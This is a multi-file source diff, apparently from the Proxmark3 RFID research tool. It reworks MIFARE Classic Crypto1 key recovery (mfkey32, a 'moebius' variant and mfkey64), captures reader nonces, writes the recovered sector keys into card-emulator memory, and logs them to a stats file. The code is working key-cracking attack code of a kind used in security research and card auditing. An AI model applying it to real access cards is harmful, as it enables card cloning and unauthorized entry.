-                         uint32_t nr;\r
-                         uint32_t nonce2;\r
-                         uint32_t ar2;\r
-                         uint32_t nr2;\r
-                       } nonces_t;\r
-                       nonces_t ar_resp[4];\r
-                       //uint32_t ar_responses[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};\r
+                       nonces_t ar_resp[ATTACK_KEY_COUNT*2];\r
                        uint64_t key = 0;\r
-                       //uint64_t keyB = 0;\r
-                       //uint8_t arnr_len = 8;\r
                        memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp));\r
-                       \r
-                       for (uint8_t i = 0; i<4; i++) {\r
+                       typedef struct {\r
+                                       uint64_t keyA;\r
+                                       uint32_t security;\r
+                                       uint64_t keyB;\r
+                       } st_t;\r
+                       st_t sector_trailer[ATTACK_KEY_COUNT];\r
+                       memset(sector_trailer, 0x00, sizeof(sector_trailer));\r
+\r
+                       uint8_t stSector[ATTACK_KEY_COUNT];\r
+                       memset(stSector, 0x00, sizeof(stSector));\r
+                       uint8_t key_cnt[ATTACK_KEY_COUNT];\r
+                       memset(key_cnt, 0x00, sizeof(key_cnt));\r
+\r
+                       for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {\r
                                if (ar_resp[i].ar2 > 0) {\r
-                                       key = mfkey32(ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);\r
-                                       if (key>0) {\r
-                                               PrintAndLog("\nFound Key%s for sector %d: [%04x%08x]", (i<2) ? "A" : "B", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));\r
-                                               //set emulator memory for key\r
-                                       }       \r
+                                       //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, ar %08x, nr %08x, ar2 %08x, nr2 %08x",ar_resp[i].sector, ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);\r
+                                       if (mfkey32(ar_resp[i], &key)) {\r
+                                               PrintAndLog("Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));\r
+\r
+                                               for (uint8_t ii = 0; ii<ATTACK_KEY_COUNT; ii++) {\r
+                                                       if (key_cnt[ii]==0 || stSector[ii]==ar_resp[i].sector) {\r
+                                                               if (ar_resp[i].keytype==0) {\r
+                                                                       //keyA\r
+                                                                       sector_trailer[ii].keyA = key;\r
+                                                                       stSector[ii] = ar_resp[i].sector;\r
+                                                                       key_cnt[ii]++;\r
+                                                                       break;\r
+                                                               } else {\r
+                                                                       //keyB\r
+                                                                       sector_trailer[ii].keyB = key;\r
+                                                                       stSector[ii] = ar_resp[i].sector;\r
+                                                                       key_cnt[ii]++;\r
+                                                                       break;\r
+                                                               }\r
+                                                       }\r
+                                               }\r
+                                       }\r
                                }\r
                        }\r
-                       /*\r
-                       if (ar_resp[1] && ar_responses[2] && ar_responses[3] && ar_responses[6] && ar_responses[7]) {\r
-                               keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]);\r
-                               if (keyA>0) {\r
-                                       PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF));\r
-                                       //set emulator memory for key\r
-                               } else {\r
-                                       keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]);                        \r
-                                       if (keyA>0) {\r
-                                               PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF));\r
-                                               //set emulator memory for key\r
+                       //set emulator memory for keys\r
+                       if (setEmulatorMem) {\r
+                               for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {\r
+                                       if (key_cnt[i]>0) {\r
+                                               //PrintAndLog   ("block %d, keyA:%04x%08x, keyb:%04x%08x",stSector[i]*4+3, (uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));\r
+                                               uint8_t memBlock[16];\r
+                                               memset(memBlock, 0x00, sizeof(memBlock));\r
+                                               char cmd1[36];\r
+                                               memset(cmd1,0x00,sizeof(cmd1));\r
+                                               snprintf(cmd1,sizeof(cmd1),"%04x%08xFF078069%04x%08x",(uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));\r
+                                               //PrintAndLog("%s",cmd1);\r
+                                               if (param_gethex(cmd1, 0, memBlock, 32)) {\r
+                                                       PrintAndLog("block data must include 32 HEX symbols");\r
+                                                       return 1;\r
+                                               }\r
+                                               \r
+                                               UsbCommand c = {CMD_MIFARE_EML_MEMSET, {(stSector[i]*4+3), 1, 0}};\r
+                                               memcpy(c.d.asBytes, memBlock, 16);\r
+                                               clearCommandBuffer();\r
+                                               SendCommand(&c);                        \r
                                        }\r
                                }\r
-                       } else {\r
-                               PrintAndLog("keyA response error: %d %d %d %d %d",ar_responses[1] , ar_responses[2] , ar_responses[3] , ar_responses[6] , ar_responses[7]);\r
                        }\r
-                       if (ar_responses[1] && ar_responses[2+arnr_len] && ar_responses[3+arnr_len] && ar_responses[6+arnr_len] && ar_responses[7+arnr_len]) {\r
-                               keyB = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2+arnr_len],ar_responses[3+arnr_len],ar_responses[6+arnr_len],ar_responses[7+arnr_len]);\r
-                               if (keyB>0) {\r
-                                       PrintAndLog("\nFound KeyB: [%04x%08x]\n\n", (uint32_t) (keyB>>32), (uint32_t) (keyB & 0xFFFFFFFF));\r
-                                       //set emulator memory for key\r
+                       //moebius attack\r
+                       for (uint8_t i = ATTACK_KEY_COUNT; i<ATTACK_KEY_COUNT*2; i++) {\r
+                               if (ar_resp[i].ar2 > 0) {\r
+                                       if (tryMfk32_moebius(ar_resp[i], &key)) {\r
+                                               PrintAndLog("M-Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));\r
+                                       }\r
                                }\r
                        }\r
-                       if (keyA || keyB) {\r
-                               //TODO retry sim with new keys in emulator memory? (somehow flag to check that to see if new key has successful auth now?)\r
-                               //      to validate key is correct\r
-                       }\r
-                       */\r
                }\r
        }\r
        \r
index 9abc814be807ce6164da6130f77fd8d75e464efd..3750366b44d8818c6ae6cad1bf45465d882bfae5 100644 (file)
@@ -151,22 +151,24 @@ int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_
 }
 
 // 32 bit recover key from 2 nonces
-uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc) {
+bool mfkey32(nonces_t data, uint64_t *outputkey) {
        struct Crypto1State *s,*t;
+       uint64_t outkey = 0;
        uint64_t key=0;     // recovered key
-       /*uint32_t uid;     // serial number
-       uint32_t nt;      // tag challenge
-       uint32_t nr0_enc; // first encrypted reader challenge
-       uint32_t ar0_enc; // first encrypted reader response
-       uint32_t nr1_enc; // second encrypted reader challenge
-       uint32_t ar1_enc; // second encrypted reader response
- */
-       uint8_t found=0;
-       //uint32_t ks2;     // keystream used to encrypt reader response
-
+       uint32_t uid     = data.cuid;
+       uint32_t nt      = data.nonce;  // first tag challenge (nonce)
+       uint32_t nr0_enc = data.nr;  // first encrypted reader challenge
+       uint32_t ar0_enc = data.ar;  // first encrypted reader response
+       uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
+       uint32_t ar1_enc = data.ar2; // second encrypted reader response
+       clock_t t1 = clock();
+       bool isSuccess = FALSE;
+       uint8_t counter=0;
+       //PrintAndLog("Enter mfkey32");
+       //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, nr %08x, ar %08x, nr2 %08x, ar2 %08x",data.sector, uid, nt,nr0_enc,ar0_enc,nr1_enc,ar1_enc);
        // Generate lfsr succesors of the tag challenge
-       prng_successor(nt, 64);
-       prng_successor(nt, 96);
+       //prng_successor(nt, 64);
+       //prng_successor(nt, 96);
 
        // Extract the keystream from the messages
        //ks2 = ar0_enc ^ prng_successor(nt, 64);
@@ -181,13 +183,112 @@ uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc,
                crypto1_word(t, uid ^ nt, 0);
                crypto1_word(t, nr1_enc, 1);
                if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) {
-                       //printf("\nFound Key: [%012"llx"]\n\n",key);
-                       found = 1;
-                       break;
+                       //PrintAndLog("Found Key: [%012"llx"]",key);
+                       outkey = key;
+                       counter++;
+                       if (counter==20) break;
                }
        }
-       free(s);
+       //free(s);
+       isSuccess = (counter == 1);
+       t1 = clock() - t1;
+       //if ( t1 > 0 ) PrintAndLog("Time in mfkey32: %.0f ticks \nFound %d possible keys", (float)t1, counter);
+       *outputkey = ( isSuccess ) ? outkey : 0;
+       crypto1_destroy(s);
+       FILE *fout;
+       if ((fout = fopen("stats.txt","ab")) == NULL) { 
+               PrintAndLog("Could not create file name stats.txt");
+               return 1;
+       }
+       fprintf(fout, "mfkey32,%d,%d,%s,%04x%08x,%.0Lf\r\n",counter,data.sector,(data.keytype) ? "B" : "A", (uint32_t)(outkey>>32) & 0xFFFF,(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
+       fclose(fout);
+       return isSuccess;
+}
 
-       if (found) return key;
+bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey) {
+       struct Crypto1State *s, *t;
+       uint64_t outkey  = 0;
+       uint64_t key       = 0;                      // recovered key
+       uint32_t uid     = data.cuid;
+       uint32_t nt0     = data.nonce;  // first tag challenge (nonce)
+       uint32_t nr0_enc = data.nr;  // first encrypted reader challenge
+       uint32_t ar0_enc = data.ar; // first encrypted reader response
+       //uint32_t uid1    = le32toh(data+16);
+       uint32_t nt1     = data.nonce2; // second tag challenge (nonce)
+       uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
+       uint32_t ar1_enc = data.ar2; // second encrypted reader response        
+       bool isSuccess = FALSE;
+       int counter = 0;
+       
+       //PrintAndLog("Enter mfkey32_moebius");
+       clock_t t1 = clock();
+
+       s = lfsr_recovery32(ar0_enc ^ prng_successor(nt0, 64), 0);
+  
+       for(t = s; t->odd | t->even; ++t) {
+               lfsr_rollback_word(t, 0, 0);
+               lfsr_rollback_word(t, nr0_enc, 1);
+               lfsr_rollback_word(t, uid ^ nt0, 0);
+               crypto1_get_lfsr(t, &key);
+               
+               crypto1_word(t, uid ^ nt1, 0);
+               crypto1_word(t, nr1_enc, 1);
+               if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt1, 64))) {
+                       //PrintAndLog("Found Key: [%012"llx"]",key);
+                       outkey=key;
+                       ++counter;
+                       if (counter==20)
+                               break;
+               }
+       }
+       isSuccess       = (counter == 1);
+       t1 = clock() - t1;
+       //if ( t1 > 0 ) PrintAndLog("Time in mfkey32_moebius: %.0f ticks \nFound %d possible keys", (float)t1,counter);
+       *outputkey = ( isSuccess ) ? outkey : 0;
+       crypto1_destroy(s);
+       FILE *fout;
+       if ((fout = fopen("stats.txt","ab")) == NULL) { 
+               PrintAndLog("Could not create file name stats.txt");
+               return 1;
+       }
+       fprintf(fout, "moebius,%d,%d,%s,%04x%08x,%0.Lf\r\n",counter,data.sector, (data.keytype) ? "B" : "A", (uint32_t) (outkey>>32),(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
+       fclose(fout);
+       return isSuccess;
+}
+
+int tryMfk64_ex(uint8_t *data, uint64_t *outputkey){
+       uint32_t uid    = le32toh(data);
+       uint32_t nt     = le32toh(data+4);  // tag challenge
+       uint32_t nr_enc = le32toh(data+8);  // encrypted reader challenge
+       uint32_t ar_enc = le32toh(data+12); // encrypted reader response        
+       uint32_t at_enc = le32toh(data+16);     // encrypted tag response
+       return tryMfk64(uid, nt, nr_enc, ar_enc, at_enc, outputkey);
+}
+
+int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey){
+       uint64_t key    = 0;                            // recovered key
+       uint32_t ks2;                                           // keystream used to encrypt reader response
+       uint32_t ks3;                                           // keystream used to encrypt tag response
+       struct Crypto1State *revstate;
+       
+       PrintAndLog("Enter mfkey64");
+       clock_t t1 = clock();
+       
+       // Extract the keystream from the messages
+       ks2 = ar_enc ^ prng_successor(nt, 64);
+       ks3 = at_enc ^ prng_successor(nt, 96);
+       revstate = lfsr_recovery64(ks2, ks3);
+       lfsr_rollback_word(revstate, 0, 0);
+       lfsr_rollback_word(revstate, 0, 0);
+       lfsr_rollback_word(revstate, nr_enc, 1);
+       lfsr_rollback_word(revstate, uid ^ nt, 0);
+       crypto1_get_lfsr(revstate, &key);
+       PrintAndLog("Found Key: [%012"llx"]", key);
+       crypto1_destroy(revstate);
+       *outputkey = key;
+       
+       t1 = clock() - t1;
+       if ( t1 > 0 ) PrintAndLog("Time in mfkey64: %.0f ticks \n", (float)t1);
        return 0;
 }
+
index b00a85dcc720cc53085fdd66cbe91a7fcfac772e..fac9c1510a2faa8613b0d696c887c45ef69d002b 100644 (file)
 #include <stdlib.h>
 #include "crapto1.h"
 #include "common.h"
+//#include <stdbool.h> //for bool
+
+typedef struct {
+                         uint32_t cuid;
+                         uint8_t  sector;
+                         uint8_t  keytype;
+                         uint32_t nonce;
+                         uint32_t ar;
+                         uint32_t nr;
+                         uint32_t nonce2;
+                         uint32_t ar2;
+                         uint32_t nr2;
+                       } nonces_t;
 
 int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key); 
-uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
+bool mfkey32(nonces_t data, uint64_t *outputkey);
+bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey);
+int tryMfk64_ex(uint8_t *data, uint64_t *outputkey);
+int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey);
+
+//uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
 
 #endif
index 9b99cdf1a9fbe0a037248fd1a4de2b4701fb1342..e4add6c09e0112390ce332f2d7052ea56899973c 100644 (file)
@@ -498,6 +498,9 @@ void xor(unsigned char *dst, unsigned char *src, size_t len) {
 int32_t le24toh (uint8_t data[3]) {
     return (data[2] << 16) | (data[1] << 8) | data[0];
 }
+uint32_t le32toh (uint8_t *data) {
+       return (uint32_t)( (data[3]<<24) | (data[2]<<16) | (data[1]<<8) | data[0]);
+}
 
 // RotateLeft - Ultralight, Desfire, works on byte level
 // 00-01-02  >> 01-02-00
index 34e821bf3c610943838d8b472f93a197e060a838..1b6b2fb1d1435e5702b89f5dc861df111711c8aa 100644 (file)
@@ -70,4 +70,5 @@ void wiegand_add_parity(uint8_t *target, uint8_t *source, uint8_t length);
 
 void xor(unsigned char *dst, unsigned char *src, size_t len);
 int32_t le24toh(uint8_t data[3]);
+uint32_t le32toh (uint8_t *data);
 void rol(uint8_t *data, const size_t len);
index cdcf720b8b2546dfbd80fbe99d5f7335d0cd1bfc..b57c414fb911bae00c8e8071c0b5dbc7a095a2fe 100644 (file)
@@ -109,20 +109,25 @@ NXP/Philips CUSTOM COMMANDS
 #define ISO14443A_CMD_WUPA       0x52
 #define ISO14443A_CMD_ANTICOLL_OR_SELECT     0x93
 #define ISO14443A_CMD_ANTICOLL_OR_SELECT_2   0x95
+#define ISO14443A_CMD_ANTICOLL_OR_SELECT_3   0x97
 #define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ?
 #define ISO14443A_CMD_HALT       0x50
 #define ISO14443A_CMD_RATS       0xE0
 
-#define MIFARE_AUTH_KEYA           0x60
-#define MIFARE_AUTH_KEYB           0x61
-#define MIFARE_MAGICWUPC1          0x40
-#define MIFARE_MAGICWUPC2              0x43
-#define MIFARE_MAGICWIPEC              0x41
+#define MIFARE_AUTH_KEYA        0x60
+#define MIFARE_AUTH_KEYB        0x61
+#define MIFARE_MAGICWUPC1       0x40
+#define MIFARE_MAGICWUPC2       0x43
+#define MIFARE_MAGICWIPEC       0x41
 #define MIFARE_CMD_INC          0xC0
 #define MIFARE_CMD_DEC          0xC1
 #define MIFARE_CMD_RESTORE      0xC2
 #define MIFARE_CMD_TRANSFER     0xB0
 
+#define MIFARE_EV1_PERSONAL_UID 0x40
+#define MIFARE_EV1_SETMODE      0x43
+
+
 #define MIFARE_ULC_WRITE        0xA2
 //#define MIFARE_ULC__COMP_WRITE  0xA0
 #define MIFARE_ULC_AUTH_1       0x1A
index 8448b06a09284e61e8566dc4f1c2b8b069847517..03a573d5d58c299e56a917371ecf57457ba5d6f0 100644 (file)
@@ -212,10 +212,11 @@ typedef struct{
 
 
 //Mifare simulation flags
-#define FLAG_INTERACTIVE 0x01
-#define FLAG_4B_UID_IN_DATA 0x02
-#define FLAG_7B_UID_IN_DATA 0x04
-#define FLAG_NR_AR_ATTACK 0x08
+#define FLAG_INTERACTIVE      0x01
+#define FLAG_4B_UID_IN_DATA   0x02
+#define FLAG_7B_UID_IN_DATA   0x04
+#define FLAG_10B_UID_IN_DATA  0x08
+#define FLAG_NR_AR_ATTACK     0x10
 
 
 //Iclass reader flags
Impressum, Datenschutz